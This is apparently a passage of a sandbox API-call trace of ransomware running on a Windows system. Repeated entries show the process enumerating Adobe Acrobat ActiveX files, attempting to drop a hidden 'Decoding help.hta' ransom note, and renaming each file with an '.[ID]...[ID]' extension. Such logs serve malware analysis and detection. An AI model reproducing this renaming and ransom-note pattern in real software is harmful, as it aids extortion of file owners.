lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.464] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.464] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.464] CloseHandle (hObject=0xffffffff) returned 0 [0046.464] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.465] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.JPN") returned 1 [0046.465] lstrlenW (lpString="AcroPDF.JPN") returned 11 [0046.465] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.465] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.465] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.JPN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN" [0046.465] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN" [0046.465] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN.[ID]g9uZrLhJaygpwRm1[ID]" [0046.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.jpn"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.jpn.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.465] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8c6340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4be00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.KOR", cAlternateFileName="")) returned 1 [0046.465] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.465] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.465] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.465] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.465] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.465] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.465] CloseHandle (hObject=0xffffffff) returned 0 [0046.465] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.466] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.KOR") returned 1 [0046.466] lstrlenW (lpString="AcroPDF.KOR") returned 11 [0046.466] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.466] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.466] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.KOR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR" [0046.466] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR" [0046.466] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR.[ID]g9uZrLhJaygpwRm1[ID]" [0046.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.kor"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.kor.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.510] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8c6340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.NLD", cAlternateFileName="")) returned 1 [0046.510] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.510] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.510] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.510] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.510] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.511] CloseHandle (hObject=0xffffffff) returned 0 [0046.511] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.511] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.NLD") returned 1 [0046.511] lstrlenW (lpString="AcroPDF.NLD") returned 11 [0046.511] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.511] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.511] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.NLD" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD" [0046.511] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD" [0046.511] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD.[ID]g9uZrLhJaygpwRm1[ID]" [0046.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nld"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nld.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.511] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8c6340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.NOR", cAlternateFileName="")) returned 1 [0046.511] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.511] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.511] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.511] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.511] CloseHandle (hObject=0xffffffff) returned 0 [0046.512] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.512] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.NOR") returned 1 [0046.512] lstrlenW (lpString="AcroPDF.NOR") returned 11 [0046.512] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.512] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.512] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.NOR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR" [0046.512] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR" [0046.512] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR.[ID]g9uZrLhJaygpwRm1[ID]" [0046.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nor"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nor.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.512] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d95e8c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.POL", cAlternateFileName="")) returned 1 [0046.512] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.512] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.512] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.512] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.512] CloseHandle (hObject=0xffffffff) returned 0 [0046.513] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.513] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.POL") returned 1 [0046.513] lstrlenW (lpString="AcroPDF.POL") returned 11 [0046.513] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.513] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.POL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL" [0046.513] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL" [0046.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL.[ID]g9uZrLhJaygpwRm1[ID]" [0046.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.pol"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.pol.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.513] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8c6340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.PTB", cAlternateFileName="")) returned 1 [0046.513] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.513] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.513] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.513] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.513] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.513] CloseHandle (hObject=0xffffffff) returned 0 [0046.513] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.514] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.PTB") returned 1 [0046.514] lstrlenW (lpString="AcroPDF.PTB") returned 11 [0046.514] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.514] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.514] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.PTB" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common 